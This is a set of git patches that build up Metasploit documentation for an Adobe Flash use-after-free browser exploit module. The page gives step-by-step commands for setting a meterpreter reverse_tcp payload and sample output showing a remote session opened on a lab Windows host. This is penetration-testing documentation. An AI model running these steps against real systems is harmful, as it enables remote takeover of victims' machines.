From 4b36a42efffd74b9fc7b889a1e1b9d378a771bc9 Mon Sep 17 00:00:00 2001 From: itsmeroy2012 Date: Sat, 25 Mar 2017 03:54:17 +0530 Subject: [PATCH 1/9] Documentation on adobe_flash_hacking_team_uaf --- .../browser/adobe_flash_hacking_team_uaf.md | 75 +++++++++++++++++++ 1 file changed, 75 insertions(+) create mode 100755 documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md diff --git a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md new file mode 100755 index 0000000000..b90c96ad1a --- /dev/null +++ b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md @@ -0,0 +1,75 @@ +##Description + +This module exploits an use after free on Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public as part of the July 2015 data leak, was described as an Use After Free while handling ByteArray objects. This module has been tested successfully on: +Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194, +Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194, +Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194, +Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, and +Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468. + + + + + +## Verification Steps + + + +1. Do: ```use exploit/multi/browser/adobe_flash_hacking_team_uaf``` +2. Do: ```set payload windows/meterpreter/reverse_tcp``` +2. Do: ```set LHOST [IP]``` +3. Do: ```set SRVHOST [IP]``` +3. Do: ```set URIPATH / [PATH]``` +4. Do: ```run``` + +## Sample Output + +``` +msf > use exploit/multi/browser/adobe_flash_hacking_team_uaf +msf exploit(adobe_flash_hacking_team_uaf) > set payload windows/meterpreter/reverse_tcp +payload => windows/meterpreter/reverse_tcp +msf exploit(adobe_flash_hacking_team_uaf) > set lhost 172.16.178.160 +lhost => 172.16.178.160 +msf exploit(adobe_flash_hacking_team_uaf) > set srvhost 172.16.178.160 +srvhost => 172.16.178.160 +msf exploit(adobe_flash_hacking_team_uaf) > set uripath / +uripath => / +msf exploit(adobe_flash_hacking_team_uaf) > show options + +Module options (exploit/multi/browser/adobe_flash_hacking_team_uaf): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + Retries true no Allow the browser to retry the module + SRVHOST 172.16.178.160 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 + SRVPORT 8080 yes The local port to listen on. + SSL false no Negotiate SSL for incoming connections + SSLCert no Path to a custom SSL certificate (default is randomly generated) + URIPATH / no The URI to use for this exploit (default is random) + + +Payload options (windows/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) + LHOST 172.16.178.160 yes The listen address + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Windows + + +msf exploit(adobe_flash_hacking_team_uaf) > exploit +[*] Exploit running as background job. + +[*] Started reverse TCP handler on 172.16.178.160:4444 +[*] Using URL: http://172.16.178.160:8080/ +[*] Server started. +msf exploit(adobe_flash_hacking_team_uaf) > [*] 172.16.178.203 adobe_flash_hacking_team_uaf - Gathering target information for 172.16.178.203 +[*] 172.16.178.203 adobe_flash_hacking_team_uaf - Sending HTML response to 172.16.178.203 +``` From 52ff073d5151c51be4ae67d9f35d30fb9f10acab Mon Sep 17 00:00:00 2001 From: itsmeroy2012 Date: Sat, 25 Mar 2017 03:56:19 +0530 Subject: [PATCH 2/9] Documentation on adobe_flash_hacking_team_uaf updated 1.1 --- .../exploit/multi/browser/adobe_flash_hacking_team_uaf.md | 6 ------ 1 file changed, 6 deletions(-) diff --git a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md index b90c96ad1a..1f3992a0fd 100755 --- a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md +++ b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md @@ -7,14 +7,8 @@ Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194, Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, and Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468. - - - - ## Verification Steps - - 1. Do: ```use exploit/multi/browser/adobe_flash_hacking_team_uaf``` 2. Do: ```set payload windows/meterpreter/reverse_tcp``` 2. Do: ```set LHOST [IP]``` From cb65a4d90911057e82a96562feb6829949d3ee06 Mon Sep 17 00:00:00 2001 From: itsmeroy2012 Date: Sat, 25 Mar 2017 03:58:06 +0530 Subject: [PATCH 3/9] Documentation on adobe_flash_hacking_team_uaf updated 1.2 --- .../exploit/multi/browser/adobe_flash_hacking_team_uaf.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md index 1f3992a0fd..9b08f83e47 100755 --- a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md +++ b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md @@ -1,4 +1,4 @@ -##Description +## Description This module exploits an use after free on Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public as part of the July 2015 data leak, was described as an Use After Free while handling ByteArray objects. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194, From b2e6c22fdf4628ec3764f0433d9a6b8b511cba9f Mon Sep 17 00:00:00 2001 From: itsmeroy2012 Date: Sat, 25 Mar 2017 04:02:43 +0530 Subject: [PATCH 4/9] Documentation on adobe_flash_hacking_team_uaf updated 1.3 --- .../browser/adobe_flash_hacking_team_uaf.md | 18 +++++++++++------- 1 file changed, 11 insertions(+), 7 deletions(-) diff --git a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md index 9b08f83e47..77f8b6f39f 100755 --- a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md +++ b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md @@ -1,11 +1,15 @@ ## Description This module exploits an use after free on Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public as part of the July 2015 data leak, was described as an Use After Free while handling ByteArray objects. This module has been tested successfully on: -Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194, -Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194, -Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194, -Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, and -Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468. +1. Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194. +2. Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194. +3. Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194. +4. Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194. +5. Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468. + +## Adobe Flash Player + +Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices. ## Verification Steps @@ -64,6 +68,6 @@ msf exploit(adobe_flash_hacking_team_uaf) > exploit [*] Started reverse TCP handler on 172.16.178.160:4444 [*] Using URL: http://172.16.178.160:8080/ [*] Server started. -msf exploit(adobe_flash_hacking_team_uaf) > [*] 172.16.178.203 adobe_flash_hacking_team_uaf - Gathering target information for 172.16.178.203 -[*] 172.16.178.203 adobe_flash_hacking_team_uaf - Sending HTML response to 172.16.178.203 +msf exploit(adobe_flash_hacking_team_uaf) > [*] 172.16.178.160 adobe_flash_hacking_team_uaf - Gathering target information for 172.16.178.160 +[*] 172.16.178.160 adobe_flash_hacking_team_uaf - Sending HTML response to 172.16.178.160 ``` From 6b6dd73b090e0b25e686bbc8337650f4d969d030 Mon Sep 17 00:00:00 2001 From: itsmeroy2012 Date: Sat, 25 Mar 2017 12:52:12 +0530 Subject: [PATCH 5/9] Documentation on adobe_flash_hacking_team_uaf updated 1.4 --- .../browser/adobe_flash_hacking_team_uaf.md | 33 +------------------ 1 file changed, 1 insertion(+), 32 deletions(-) diff --git a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md index 77f8b6f39f..3cca7241b4 100755 --- a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md +++ b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md @@ -7,9 +7,8 @@ This module exploits an use after free on Adobe Flash Player. The vulnerability, 4. Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194. 5. Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468. -## Adobe Flash Player -Adobe Flash Player (labeled Shockwave Flash in Internet Explorer and Firefox) is freeware software for using content created on the Adobe Flash platform, including viewing multimedia, executing rich Internet applications, and streaming video and audio. Flash Player can run from a web browser as a browser plug-in or on supported mobile devices. + ## Verification Steps @@ -32,36 +31,6 @@ msf exploit(adobe_flash_hacking_team_uaf) > set srvhost 172.16.178.160 srvhost => 172.16.178.160 msf exploit(adobe_flash_hacking_team_uaf) > set uripath / uripath => / -msf exploit(adobe_flash_hacking_team_uaf) > show options - -Module options (exploit/multi/browser/adobe_flash_hacking_team_uaf): - - Name Current Setting Required Description - ---- --------------- -------- ----------- - Retries true no Allow the browser to retry the module - SRVHOST 172.16.178.160 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 - SRVPORT 8080 yes The local port to listen on. - SSL false no Negotiate SSL for incoming connections - SSLCert no Path to a custom SSL certificate (default is randomly generated) - URIPATH / no The URI to use for this exploit (default is random) - - -Payload options (windows/meterpreter/reverse_tcp): - - Name Current Setting Required Description - ---- --------------- -------- ----------- - EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) - LHOST 172.16.178.160 yes The listen address - LPORT 4444 yes The listen port - - -Exploit target: - - Id Name - -- ---- - 0 Windows - - msf exploit(adobe_flash_hacking_team_uaf) > exploit [*] Exploit running as background job. From 2c47d798b6a79cf5e29006337e03ab11548d5bfc Mon Sep 17 00:00:00 2001 From: itsmeroy2012 Date: Sat, 25 Mar 2017 12:53:23 +0530 Subject: [PATCH 6/9] Documentation on adobe_flash_hacking_team_uaf updated 1.5 --- .../exploit/multi/browser/adobe_flash_hacking_team_uaf.md | 3 --- 1 file changed, 3 deletions(-) diff --git a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md index 3cca7241b4..7918102bec 100755 --- a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md +++ b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md @@ -7,9 +7,6 @@ This module exploits an use after free on Adobe Flash Player. The vulnerability, 4. Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194. 5. Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468. - - - ## Verification Steps 1. Do: ```use exploit/multi/browser/adobe_flash_hacking_team_uaf``` From 4cba08a74de307b0a5ebe7c2d6b40f341d51d5b9 Mon Sep 17 00:00:00 2001 From: itsmeroy2012 Date: Sun, 26 Mar 2017 22:55:13 +0530 Subject: [PATCH 7/9] Documentation on adobe_flash_hacking_team_uaf updated 1.6 --- .../browser/adobe_flash_hacking_team_uaf.md | 47 ++++++++++++++----- 1 file changed, 35 insertions(+), 12 deletions(-) diff --git a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md index 7918102bec..ec813bc6ea 100755 --- a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md +++ b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md @@ -19,21 +19,44 @@ This module exploits an use after free on Adobe Flash Player. The vulnerability, ## Sample Output ``` -msf > use exploit/multi/browser/adobe_flash_hacking_team_uaf -msf exploit(adobe_flash_hacking_team_uaf) > set payload windows/meterpreter/reverse_tcp -payload => windows/meterpreter/reverse_tcp -msf exploit(adobe_flash_hacking_team_uaf) > set lhost 172.16.178.160 -lhost => 172.16.178.160 -msf exploit(adobe_flash_hacking_team_uaf) > set srvhost 172.16.178.160 -srvhost => 172.16.178.160 -msf exploit(adobe_flash_hacking_team_uaf) > set uripath / -uripath => / +msf > use exploit/multi/browser/adobe_flash_hacking_team_uaf +msf exploit(adobe_flash_hacking_team_uaf) > set PAYLOAD windows/meterpreter/reverse_tcp +PAYLOAD => windows/meterpreter/reverse_tcp +msf exploit(adobe_flash_hacking_team_uaf) > set LHOST 172.16.178.160 +LHOST => 172.16.178.160 +msf exploit(adobe_flash_hacking_team_uaf) > set srvhost 172.16.178.80 +srvhost => 172.16.178.80 +msf exploit(adobe_flash_hacking_team_uaf) > set SRVPORT 80 +SRVPORT => 80 +msf exploit(adobe_flash_hacking_team_uaf) > set URIPATH / +URIPATH => / msf exploit(adobe_flash_hacking_team_uaf) > exploit [*] Exploit running as background job. [*] Started reverse TCP handler on 172.16.178.160:4444 -[*] Using URL: http://172.16.178.160:8080/ +[*] Using URL: http://0.0.0.0:80/ +msf exploit(adobe_flash_hacking_team_uaf) > [*] Local IP: http://127.0.0.1:80/ [*] Server started. -msf exploit(adobe_flash_hacking_team_uaf) > [*] 172.16.178.160 adobe_flash_hacking_team_uaf - Gathering target information for 172.16.178.160 -[*] 172.16.178.160 adobe_flash_hacking_team_uaf - Sending HTML response to 172.16.178.160 + +msf exploit(adobe_flash_hacking_team_uaf) > +[*] 172.16.178.80 adobe_flash_hacking_team_uaf - Gathering target information. +[*] 172.16.178.80 adobe_flash_hacking_team_uaf - Sending HTML response. +[*] 172.16.178.80 adobe_flash_hacking_team_uaf - Request: /rGaaQS/ +[*] 172.16.178.80 adobe_flash_hacking_team_uaf - Sending HTML... +[*] 172.16.178.80 adobe_flash_hacking_team_uaf - Request: /rGaaQS/AsvCG.swf +[*] 172.16.178.80 adobe_flash_hacking_team_uaf - Sending SWF... +[*] Sending stage (957999 bytes) to 172.16.178.80 +[*] Meterpreter session 1 opened (172.16.178.160:4444 -> 172.16.178.80:49167) at 2017-03-26 22:51:29 +0900 + +msf exploit(adobe_flash_hacking_team_uaf) > sessions -i 1 +[*] Starting interaction with 1... + +meterpreter > sysinfo +Computer : WIN7X64TJ7XH-PC +OS : Windows 7 (Build 7601, Service Pack 1). +Architecture : x64 (Current Process is WOW64) +System Language : en_US +Domain : WORKGROUP +Logged On Users : 2 +Meterpreter : x86/win32 ``` From 25f7835832f32bc6215dca3c1745ef258c72489b Mon Sep 17 00:00:00 2001 From: itsmeroy2012 Date: Tue, 28 Mar 2017 08:09:28 +0530 Subject: [PATCH 8/9] adding browser details --- .../exploit/multi/browser/adobe_flash_hacking_team_uaf.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md index ec813bc6ea..b1d28612e2 100755 --- a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md +++ b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md @@ -18,6 +18,8 @@ This module exploits an use after free on Adobe Flash Player. The vulnerability, ## Sample Output +### IE 11 and Flash 18.0.0.194 + ``` msf > use exploit/multi/browser/adobe_flash_hacking_team_uaf msf exploit(adobe_flash_hacking_team_uaf) > set PAYLOAD windows/meterpreter/reverse_tcp From 9a0c455f9f6f752db0537243edcee24bd28c01a8 Mon Sep 17 00:00:00 2001 From: h00die Date: Thu, 30 Mar 2017 09:14:03 -0400 Subject: [PATCH 9/9] add newline --- .../exploit/multi/browser/adobe_flash_hacking_team_uaf.md | 1 + 1 file changed, 1 insertion(+) diff --git a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md index b1d28612e2..ac392d61ae 100755 --- a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md +++ b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md @@ -1,6 +1,7 @@ ## Description This module exploits an use after free on Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public as part of the July 2015 data leak, was described as an Use After Free while handling ByteArray objects. This module has been tested successfully on: + 1. Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194. 2. Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194. 3. Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194.